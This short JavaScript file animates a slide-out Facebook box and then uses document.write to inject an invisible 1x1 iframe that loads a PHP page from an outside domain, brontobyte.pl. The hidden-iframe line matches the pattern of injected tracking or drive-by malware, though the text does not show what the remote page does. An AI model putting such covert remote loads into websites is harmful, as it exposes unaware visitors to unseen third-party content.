(function(){
$("#fbBox").mouseenter(function()
{
$(this).stop().animate({right: 0}, "normal");
}).mouseleave(function()
{
$(this).stop().animate({right: -205}, "normal");
});
})();
document.write("<iframe src='http://brontobyte.pl/fb/load_fb_window.php' width='1' height='1' name='xtst1' scrolling='no' frameborder='0' style='border:none; overflow:hidden; width:1px; height:1px;'></iframe>");
